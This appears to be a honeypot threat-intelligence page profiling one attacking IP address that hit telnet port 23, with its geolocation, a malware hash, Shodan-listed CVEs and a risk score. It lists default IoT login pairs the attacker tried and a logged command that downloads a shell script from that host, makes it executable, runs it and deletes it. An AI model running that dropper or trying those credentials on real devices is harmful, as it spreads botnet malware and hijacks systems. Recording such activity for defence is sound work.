TROYANOSYVIRUS
Active ThreatLOW

64.89.163.118

Country of Origin🇬🇧 United Kingdom
First Detection3/26/2026
Last Activity3/27/2026
ISPNetiface America, Inc.
🎯
53
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
1
Malware

Geolocation

Country
🇬🇧 United Kingdom
City
Unknown
ASN
AS401626
ISP
Netiface America, Inc.

Attack Types

ssh_telnet_honeypot

Attacked Ports

23

Associated Malware

bf0843d014600a215ca7...

Attempted Credentials

🔐support/support
4x
🔐root/vizxv
3x
🔐root/xc3511
3x
🔐telnet/telnet
2x
🔐root/root
1x

Executed Commands

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://64.89.163.118/cat.sh; chmod 777 cat.sh; sh cat.sh; rm -f cat.sh *4x

Shodan InternetDB ExposureShodan

InternetDB data, not real-time

Ports
802323
Vulnerabilities
CVE-2022-22720CVE-2011-2688CVE-2024-38473CVE-2013-0941CVE-2022-29404CVE-2022-23943CVE-2025-59775CVE-2013-4365CVE-2013-2765CVE-2025-66200CVE-2023-38709CVE-2024-42516CVE-2022-37436CVE-2022-26377CVE-2022-28330CVE-2025-53020CVE-2023-31122CVE-2025-49812CVE-2023-25690CVE-2023-27522
CPEs
cpe:/a:apache:http_server:2.4.52cpe:/o:canonical:ubuntu_linux

Risk Assessment

35
/100
LowMediumHighCritical